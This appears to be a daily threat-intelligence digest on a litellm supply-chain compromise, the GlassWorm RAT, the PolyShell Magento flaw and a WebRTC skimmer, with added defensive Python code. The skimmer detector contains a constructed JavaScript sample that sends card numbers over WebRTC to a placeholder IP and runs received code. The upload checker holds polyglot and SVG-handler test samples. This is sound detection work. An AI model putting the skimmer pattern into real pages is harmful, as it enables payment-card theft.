Diamond Trail

Cyware Daily Threat Intelligence, March 26, 2026


The software supply chain is under renewed pressure as TeamPCP weaponizes the "litellm" Python library, pivoting from security scanners to core AI infrastructure. Now collaborating with the LAPSUS$ extortion group, TeamPCP is actively mining 300 GB of stolen data to target multi-billion-dollar enterprises.

Developer ecosystems are facing a resilient new threat as the GlassWorm campaign evolves into a multi-stage offensive whose command-and-control details are hidden in Solana blockchain transactions. The latest wave of attacks uses a deceptive Google Chrome extension, disguised as an offline version of Google Docs, to log keystrokes, capture screenshots, and siphon session tokens from infected workstations.

E-commerce security is under siege as a mass exploitation campaign targets a critical "perfect 10" (maximum-severity) vulnerability in Magento and Adobe Commerce, known as PolyShell. Since automated scanning began on March 19, over 56% of vulnerable storefronts have been hit by unauthenticated attackers who use the REST API to upload "polyglot" files.

Top Malware Reported in the Last 24 Hours

TeamPCP compromises LiteLLM Python package

The threat actor TeamPCP has compromised the popular Python package "litellm", publishing malicious versions 1.82.7 and 1.82.8 on March 24. The poisoned releases bundle a credential harvester, a Kubernetes lateral-movement toolkit, and a persistent backdoor, and they target CI/CD environments, sweeping up sensitive data such as SSH keys and cloud credentials. The multi-stage payload executes automatically when the package is imported, so every build, notebook, or service that pulled one of the two versions is affected, and any credential reachable from such an environment should be treated as exposed and rotated. As TeamPCP expands its operations, it is collaborating with the notorious extortion group LAPSUS$ and targeting multiple ecosystems, underscoring how fragile the software supply chain remains.

WebRTC skimmer bypasses CSP to steal data

Cybersecurity researchers have uncovered a new payment skimmer that uses WebRTC data channels to exfiltrate payment data from e-commerce sites, bypassing Content Security Policy (CSP) protections: connect-src governs fetch, XHR and WebSocket requests but not WebRTC peer connections, so a policy that blocks the usual exfiltration paths leaves this channel open (CSP Level 3 defines a separate webrtc 'block' directive, but confirm support in the browsers you care about before relying on it). The skimmer is planted through the PolyShell vulnerability in Magento Open Source and Adobe Commerce, which lets unauthenticated attackers upload and execute malicious code via the REST API. Since March 19 the vulnerability has been widely exploited, with over 50 IP addresses involved in scanning and 56.7% of vulnerable stores affected. Once running, the skimmer opens a WebRTC peer connection to a hard-coded IP address, retrieves JavaScript over that channel, and uses it to steal payment information.
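Because the exfiltration channel does not show up in connect-src violations, hunting for this skimmer means looking at the JavaScript a storefront actually serves. The following added example (not code from the report or from the researchers who found the skimmer) scans a script for the pattern described above: WebRTC API use combined with a hard-coded remote endpoint instead of one obtained through a signalling server, plus payment-field access or a dynamic-code loader. Both sample scripts are constructed, and 203.0.113.45 is a documentation-range placeholder, not an address from the campaign.

```python
"""Added example, not from the original report: a static scan of storefront
JavaScript for a WebRTC peer connection to a hard-coded endpoint, the
skimmer pattern described above.  Sample scripts are constructed; the
field names in PAYMENT_RE are generic assumptions."""
import ipaddress
import re

WEBRTC_APIS = ("RTCPeerConnection", "createDataChannel",
               "setRemoteDescription", "addIceCandidate")
IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
# SDP ICE candidate: candidate:<foundation> <component> <transport> <priority> <address> <port> typ ...
ICE_RE = re.compile(r"candidate:\S+\s+\d+\s+(?:udp|tcp)\s+\d+\s+(\S+)\s+\d+\s+typ", re.I)
# Field names a skimmer reads; these are generic assumptions, adjust to the checkout form.
PAYMENT_RE = re.compile(r"cc_number|card_number|cvv|cvc|expir", re.I)
# The report says the skimmer fetches JavaScript over the channel and runs it.
DYNAMIC_EXEC_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(")


def hardcoded_endpoints(src):
    """IP literals and ICE candidate addresses embedded in the script (loopback excluded)."""
    found = set(IPV4_RE.findall(src))
    found.update(m.group(1) for m in ICE_RE.finditer(src))
    result = set()
    for addr in found:
        try:
            if ipaddress.ip_address(addr).is_loopback:
                continue
        except ValueError:
            pass  # hostname-style candidate address: still a hard-coded peer, keep it
        result.add(addr)
    return sorted(result)


def scan_script(src):
    """Classify one script; 'webrtc-signaled' is the normal, benign shape of WebRTC code."""
    apis = [a for a in WEBRTC_APIS if a in src]
    endpoints = hardcoded_endpoints(src) if apis else []
    if not apis:
        verdict = "no-webrtc"
    elif not endpoints:
        verdict = "webrtc-signaled"
    elif PAYMENT_RE.search(src) or DYNAMIC_EXEC_RE.search(src):
        verdict = "likely-skimmer"
    else:
        verdict = "suspicious"
    return {"verdict": verdict, "apis": apis, "endpoints": endpoints}


# Constructed sample: the shape of the skimmer described in the report, not its code.
SKIMMER_LIKE = r"""
var pc = new RTCPeerConnection({iceServers: []});
var ch = pc.createDataChannel("d");
pc.setRemoteDescription({type: "answer",
  sdp: "v=0\r\nc=IN IP4 203.0.113.45\r\na=candidate:1 1 udp 2130706431 203.0.113.45 3478 typ host\r\n"});
ch.onmessage = function (e) { (new Function(e.data))(); };
document.querySelector("[name=cc_number]").addEventListener("change", function () { ch.send(this.value); });
"""

# Constructed sample: legitimate WebRTC, remote description comes from the site's own signalling API.
BENIGN_WEBRTC = r"""
var pc = new RTCPeerConnection({iceServers: [{urls: "stun:stun.l.google.com:19302"}]});
fetch("/api/signal").then(function (r) { return r.json(); }).then(function (d) { pc.setRemoteDescription(d); });
"""

if __name__ == "__main__":
    for label, src in (("skimmer-like", SKIMMER_LIKE), ("benign", BENIGN_WEBRTC)):
        print(label, scan_script(src))
```

Run this over every script the checkout page loads, including inline blocks and anything pulled from the media directory, since that is where a PolyShell upload lands. A hit on "suspicious" or "likely-skimmer" is a reason to diff the file against the release and your own deploy, not a conviction on its own; obfuscated skimmers that assemble the IP at runtime will evade a literal match, so pair this with the published attacker IP list from the report.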

GlassWorm malware delivers RAT via extensions

Cybersecurity researchers have identified a new evolution of the GlassWorm malware campaign, which uses a multi-stage framework to deliver a RAT capable of extensive data theft. The malware masquerades as a Google Chrome extension labelled as an offline version of Google Docs, enabling it to log keystrokes, capture screenshots, and exfiltrate cookies and session tokens. Initial access is gained through rogue packages published on platforms such as npm and GitHub, while the C2 server details are hidden within Solana blockchain transactions, so takedowns of individual servers do not sever the channel. The malware can harvest credentials, exfiltrate cryptocurrency wallet data, and deploy a phishing interface targeting hardware wallets. The attack chain also includes a WebSocket-based RAT that siphons browser data and executes arbitrary commands.

Top Vulnerabilities Reported in the Last 24 Hours

Critical vulnerability in PTC software identified

PTC Inc. has alerted users to a critical vulnerability (CVE-2026-4681) in its Windchill and FlexPLM product lifecycle management solutions that could enable remote code execution through deserialization of untrusted data. The issue has prompted urgent action from German authorities, with the federal police (BKA) dispatched to inform affected companies of the risk. PTC is working on patches for all supported versions, but no official fixes are available yet, and the company has not detected any exploitation against its customers. Until patches ship, operators should limit the network exposure of these servers and watch for exploitation attempts.

PolyShell exploitation hits over half of vulnerable Magento stores

Attacks exploiting the PolyShell vulnerability in Magento Open Source and Adobe Commerce version 2 are currently affecting over 56% of vulnerable stores. The flaw stems from a REST API endpoint that accepts file uploads; depending on the web server configuration, an uploaded polyglot file can lead to remote code execution or, through stored cross-site scripting (XSS), to account takeover. Following public disclosure, mass exploitation began on March 19, 2026. Adobe shipped a fix in version 2.4.9-beta1 on March 10, but it has not yet been backported to a stable release. Some attacks additionally deploy a novel WebRTC-based payment skimmer that bypasses CSP controls, making detection harder. Researchers have published a list of IP addresses associated with these attacks.
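The upload side of PolyShell turns on a file that is a valid image to the validator and PHP or script to whatever serves it later. The following added example (not code from the report, from Adobe, or from Magento) is a content gate for uploaded files that flags that polyglot shape, an SVG carrying an event handler (the stored-XSS path), and filenames with an executable extension hidden behind an image one. The sample files are constructed for illustration and contain only harmless markers.

```python
"""Added example, not from the original report or from Adobe/Magento: an
upload content check that flags image/PHP polyglots, SVGs with active
content, and executable extensions disguised behind an image extension.
Sample files are constructed for illustration."""
import re

IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
# Extensions a permissive web server may hand to the PHP interpreter.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "pht"}
# Markers of active content hiding inside an otherwise valid image or SVG.
ACTIVE_RE = re.compile(rb"<\?php|<\?=|<script\b|\bon[a-z]+\s*=|javascript:", re.I)


def sniff_type(data):
    """Identify the file by content, never by its declared extension or MIME type."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    head = data[:512].lstrip().lower()
    if head.startswith((b"<svg", b"<?xml")) and b"<svg" in head:
        return "svg"
    return "unknown"


def has_executable_extension(filename):
    """Catches shell.php as well as double extensions such as shell.php.jpg."""
    parts = filename.lower().split(".")
    return any(p in EXECUTABLE_EXTS for p in parts[1:])


def inspect_upload(filename, data):
    """Return the sniffed type and every reason the upload should be rejected."""
    kind = sniff_type(data)
    reasons = []
    marker = ACTIVE_RE.search(data)
    if kind == "unknown":
        reasons.append("content is not a recognised image format")
    elif marker:
        # A valid image header followed by PHP/script is exactly the polyglot shape.
        reasons.append(f"{kind} file embeds active content: {marker.group(0).decode('ascii', 'replace')}")
    if has_executable_extension(filename):
        reasons.append("filename carries an executable extension")
    return {"type": kind, "reject": bool(reasons), "reasons": reasons}


# Constructed samples (not real attack artifacts): PNG header followed by a
# harmless PHP tag, a minimal clean JPEG, and an SVG with an event handler.
PNG_POLYGLOT = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16 + b"<?php echo 1; ?>"
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 32 + b"\xff\xd9"
SVG_WITH_HANDLER = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"></svg>'

if __name__ == "__main__":
    for name, blob in (("logo.png", PNG_POLYGLOT), ("photo.jpg", CLEAN_JPEG),
                       ("photo.php.jpg", CLEAN_JPEG), ("icon.svg", SVG_WITH_HANDLER)):
        print(name, inspect_upload(name, blob))
```

Treat this as a gate and a detection signal, not a complete defence: re-encoding every accepted image with an image library strips embedded payloads outright, and a byte-pattern scan can occasionally false-positive on EXIF text. The extension check matters because the report ties code execution to web-server configuration: a server that maps .php anywhere in a multi-extension filename, or that serves the media directory with PHP enabled, is what turns a polyglot upload into a shell, so audit those handler rules alongside the upload path.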
